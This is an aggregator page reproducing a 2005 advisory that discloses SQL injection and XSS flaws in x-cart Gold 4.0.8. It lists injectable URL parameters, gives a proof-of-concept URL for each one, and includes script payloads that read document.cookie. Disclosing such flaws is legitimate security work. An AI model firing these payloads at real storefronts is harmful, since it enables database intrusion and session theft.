Lucene search
xcartGold.txt
🗓️ 14 Aug 2005 00:00:00Reported by svt.nukleon.usType 
packetstorm🔗 packetstormsecurity.com👁 19 Views
Multiple vulnerabilities in x-cart Gold version 4.0.8 including SQL injections and XS
Show more
`
SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Multiple vulnerabilities in x-cart Gold
The program: x-cart Gold
The vulnerable version: 4.0.8
Homepage: www.x-cart.com
Vulnerability is found: 29.05.05
Has found: CENSORED / SVT / www.svt.nukleon.us
=====================================================================
The description.
SQL - injections
---------------
At research of a product the set Multiple vulnerabilities was revealed
SQL-Injections. Vulnerability mentions practically all parameters.
The first mistake has been found in parameter "cat". In a script
There is no check of this parameter and at substitution of a symbol
"'" Probably, to make SQL-an injection. Further the mistake has been
found in Parameter "productid" as from - for absence of check on
Special symbols, by transfer to this parameter of a symbol "'" occurs
Mistake SQL, and script forwards automatically on page
Speaking about a mistake. On this page the parameter "id" is visible to it
We transfer a symbol "'" and as probably to make SQL - an injection.
Further we look parameter "mode", at substitution Special symbols
There is a mistake and probably to make SQL - an injection. We shall wound
And parameter "section" in it it is possible to make SQL - an injection.
XSS
---------------
Vulnerability of type XSS can make in the same parameters as at mistakes
SQL - injections
=====================================================================
Example
^^^^^^^^^
SQL - injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]
XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================
The conclusion.
^^^^^^^^^^^
Researches made only on version 4.0.8. Other versions as
Can be vulnerable. The manufacturer in popularity is put. If is
What that remarks write on [email protected]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
___
___ / /
____________\__\___ / /
| _______________// _/_
____|__________ |\ \/ | |
/__________________| \____/ |
___| |___
|___ ___|
| |___
|_______|
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4